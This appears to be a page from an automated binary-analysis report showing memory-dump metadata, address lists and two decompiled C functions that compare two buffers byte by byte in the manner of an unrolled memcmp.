0x00850239
0x0085023b
0x00000000
0x00000000
0x00850241
0x00850247
0x008502ce
0x008502d0
0x008502d2
0x00000000
0x00000000
0x008502d8
0x008502de
0x00850365
0x00850367
0x00850369
0x00000000
0x00000000
0x0085036f
0x00850375
0x008503fc
0x008503fe
0x00850400
0x00000000
0x00000000
0x0085040c
0x00850494
0x00850496
0x00850498
0x00000000
0x00000000
0x0085049e
0x008504a4
0x0085052b
0x0085052d
0x0085052f
0x0085052f
0x00000000
0x0085052f
0x008504b1
0x008504b3
0x008504cb
0x008504d3
0x008504d5
0x008504ed
0x008504f5
0x008504f7
0x0085050f
0x00850517
0x00850519
0x00850522
0x00850522
0x00000000
0x00850519
0x00850500
0x00850509
0x00000000
0x00000000
0x00000000
0x00850509
0x008504de
0x008504e7
0x00000000
0x00000000
0x00000000
0x008504e7
0x008504bc
0x008504c5
0x00000000
0x00000000
0x00000000
0x008504c5
0x0085041a
0x0085041c
0x00850434
0x0085043c
0x0085043e
0x00850456
0x0085045e
0x00850460
0x00850478
0x00850480
0x00850482
0x0085048b
0x0085048b
0x00000000
0x00850482
0x00850469
0x00850472
0x00000000
0x00000000
0x00000000
0x00850472
0x00850447
0x00850450
0x00000000
0x00000000
0x00000000
0x00850450
0x00850425
0x0085042e
0x00000000
0x00000000
0x00000000
0x0085042e
0x00850382
0x00850384
0x0085039c
0x008503a4
0x008503a6
0x008503be
0x008503c6
0x008503c8
0x008503e0
0x008503e8
0x008503ea
0x008503f3
0x008503f3
0x00000000
0x008503ea
0x008503d1
0x008503da
0x00000000
0x00000000
0x00000000
0x008503da
0x008503af
0x008503b8
0x00000000
0x00000000
0x00000000
0x008503b8
0x0085038d
0x00850396
0x00000000
0x00000000
0x00000000
0x00850396
0x008502eb
0x008502ed
0x00850305
0x0085030d
0x0085030f
0x00850327
0x0085032f
0x00850331
0x00850349
0x00850351
0x00850353
0x0085035c
0x0085035c
0x00000000
0x00850353
0x0085033a
0x00850343
0x00000000
0x00000000
0x00000000
0x00850343
0x00850318
0x00850321
0x00000000
0x00000000
0x00000000
0x00850321
0x008502f6
0x008502ff
0x00000000
0x00000000
0x00000000
0x008502ff
0x00850254
0x00850256
0x0085026e
0x00850276
0x00850278
0x00850290
0x00850298
0x0085029a
0x008502b2
0x008502ba
0x008502bc
0x008502c5
0x008502c5
0x00000000
0x008502bc
0x008502a3
0x008502ac
0x00000000
0x00000000
0x00000000
0x008502ac
0x00850281
0x0085028a
0x00000000
0x00000000
0x00000000
0x0085028a
0x0085025f
0x00850268
0x00000000
0x00000000
0x00000000
0x00850268
0x008501bd
0x008501bf
0x008501d7
0x008501df
0x008501e1
0x008501f9
0x00850201
0x00850203
0x0085021b
0x00850223
0x00850225
0x0085022e
0x0085022e
0x00000000
0x00850225
0x0085020c
0x00850215
0x00000000
0x00000000
0x00000000
0x00850215
0x008501ea
0x008501f3
0x00000000
0x00000000
0x00000000
0x008501f3
0x008501c8
0x008501d1
0x00000000
0x00000000
0x00000000
0x0085011f
0x0085011f
0x00850126
0x00850128
0x00850140
0x00850140
0x00850148
0x0085014a
0x00850162
0x00850162
0x0085016a
0x0085016c
0x00850184
0x00850184
0x0085018c
0x0085018e
0x00850197
0x00850197
0x00000000
0x0085018e
0x00850172
0x00850175
0x0085017e
0x0084fcd6
0x0084fcd6
0x00850ac7
0x00850ac7
0x00000000
0x0085017e
0x00850150
0x00850153
0x0085015c
0x00000000
0x00000000
0x00000000
0x0085015c
0x0085012e
0x00850131
0x0085013a
0x00000000
0x00000000
0x00000000
0x0085013a

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 606937a5280eb4ac5d0f80a773112e2224892996da059fdc7301f07cc561c186
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: D7C197722051AB0BDF2D4639857417EBAA1FBA17B231A076DDCB3CB1D5FE20C568DA10

Uniqueness

Uniqueness Score: -1.00%

Function 00850548, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00850548(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}

0x00850548
0x00850548
0x0085054e
0x008505d6
0x008505d8
0x008505da
0x00000000
0x00000000
0x008505e0
0x008505e6
0x0085066d
0x0085066f
0x00850671
0x00000000
0x00000000
0x00850677
0x0085067d
0x00850704
0x00850706
0x00850708
0x00000000
0x00000000
0x0085070e
0x00850714
0x0085079b
0x0085079d
0x0085079f
0x00000000
0x00000000
0x008507ab
0x00850833
0x00850835
0x00850837
0x00000000
0x00000000
0x0085083d
0x00850843
0x008508ca
0x008508cc
0x008508ce
0x00000000
0x00000000
0x008508d4
0x008508da
0x00850961
0x00850963
0x00850965
0x00000000
0x00000000
0x00850973
0x00850975
0x0085098d
0x00850995
0x00850997
0x008500f0
0x008500f8
0x008500fa
0x00850107
0x00850107
0x00000000
0x008500fa
0x008509a4
0x008500ea
0x00000000
0x00000000
0x00000000
0x00000000
0x008500ea
0x0085097e
0x00850987
0x00000000
0x00000000
0x00000000
0x00850987
0x008508e7
0x008508e9
0x00850901
0x00850909
0x0085090b
0x00850923
0x0085092b
0x0085092d
0x00850945
0x0085094d
0x0085094f
0x00850958
0x00850958
0x00000000
0x0085094f
0x00850936
0x0085093f
0x00000000
0x00000000
0x00000000
0x0085093f
0x00850914
0x0085091d
0x00000000
0x00000000
0x00000000
0x0085091d
0x008508f2
0x008508fb
0x00000000
0x00000000
0x00000000
0x008508fb
0x00850850
0x00850852
0x0085086a
0x00850872
0x00850874
0x0085088c
0x00850894
0x00850896
0x008508ae
0x008508b6
0x008508b8
0x008508c1
0x008508c1
0x00000000
0x008508b8
0x0085089f
0x008508a8
0x00000000
0x00000000
0x00000000
0x008508a8
0x0085087d
0x00850886
0x00000000
0x00000000
0x00000000
0x00850886
0x0085085b
0x00850864
0x00000000
0x00000000
0x00000000
0x00850864
0x008507b9
0x008507bb
0x008507d3
0x008507db
0x008507dd
0x008507f5
0x008507fd
0x008507ff
0x00850817
0x0085081f
0x00850821
0x0085082a
0x0085082a
0x00000000
0x00850821
0x00850808
0x00850811
0x00000000
0x00000000
0x00000000
0x00850811
0x008507e6
0x008507ef
0x00000000
0x00000000
0x00000000
0x008507ef
0x008507c4
0x008507cd
0x00000000
0x00000000
0x00000000
0x008507cd
0x00850721
0x00850723
0x0085073b
0x00850743
0x00850745
0x0085075d
0x00850765
0x00850767
0x0085077f
0x00850787
0x00850789
0x00850792
0x00850792
0x00000000
0x00850789
0x00850770
0x00850779
0x00000000
0x00000000
0x00000000
0x00850779
0x0085074e
0x00850757
0x00000000
0x00000000
0x00000000
0x00850757
0x0085072c
0x00850735
0x00000000
0x00000000
0x00000000
0x00850735
0x0085068a
0x0085068c
0x008506a4
0x008506ac
0x008506ae
0x008506c6
0x008506ce
0x008506d0
0x008506e8
0x008506f0
0x008506f2
0x008506fb
0x008506fb
0x00000000
0x008506f2
0x008506d9
0x008506e2
0x00000000
0x00000000
0x00000000
0x008506e2
0x008506b7
0x008506c0
0x00000000
0x00000000
0x00000000
0x008506c0
0x00850695
0x0085069e
0x00000000
0x00000000
0x00000000
0x0085069e
0x008505f3
0x008505f5
0x0085060d
0x00850615
0x00850617
0x0085062f
0x00850637
0x00850639
0x00850651
0x00850659
0x0085065b
0x00850664
0x00850664
0x00000000
0x0085065b
0x00850642
0x0085064b
0x00000000
0x00000000
0x00000000
0x0085064b
0x00850620
0x00850629
0x00000000
0x00000000
0x00000000
0x00850629
0x008505fe
0x00850607
0x00000000
0x00000000
0x00000000
0x00850554
0x00850558
0x0085055c
0x0085055e
0x00850576
0x00850576
0x0085057e
0x00850580
0x00850598
0x00850598
0x008505a0
0x008505a2
0x008505ba
0x008505ba
0x008505c2
0x008505c4
0x008505cd
0x008505cd
0x00000000
0x008505c4
0x008505a8
0x008505ab
0x008505b4
0x00000000
0x00000000
0x00000000
0x008505b4
0x00850586
0x00850589
0x00850592
0x00000000
0x00000000
0x00000000
0x00850592
0x00850564
0x00850567
0x00850570
0x00000000
0x00000000
0x00000000
0x00850570
0x0084fcd6
0x0084fcd6
0x00850ac7

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 00b7675b669e5976298a2a1d45eaef048582c0268b3514f829ed25b33f9aec32
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 73C187722051AB0BDF6D4639857453EBBA1BFA27B231A076DDCB2CB1C5FE10D528D920

Uniqueness

Uniqueness Score: -1.00%

Function 0084FCDE, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0084FCDE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x0084fcde
0x0084fcde
0x0084fce4
0x0084fd5b
0x0084fd5d
0x0084fd5f
0x00000000
0x00000000
0x0084fd65
0x0084fd6b
0x0084fdf2
0x0084fdf4
0x0084fdf6
0x00000000
0x00000000
0x0084fdfc
0x0084fe02
0x0084fe89
0x0084fe8b
0x0084fe8d
0x00000000
0x00000000
0x0084fe93
0x0084fe99
0x0084ff20
0x0084ff22
0x0084ff24
0x00000000
0x00000000
0x0084ff2a
0x0084ff30
0x0084ffb7
0x0084ffb9
0x0084ffbb
0x00000000
0x00000000
0x0084ffc7
0x0085004f
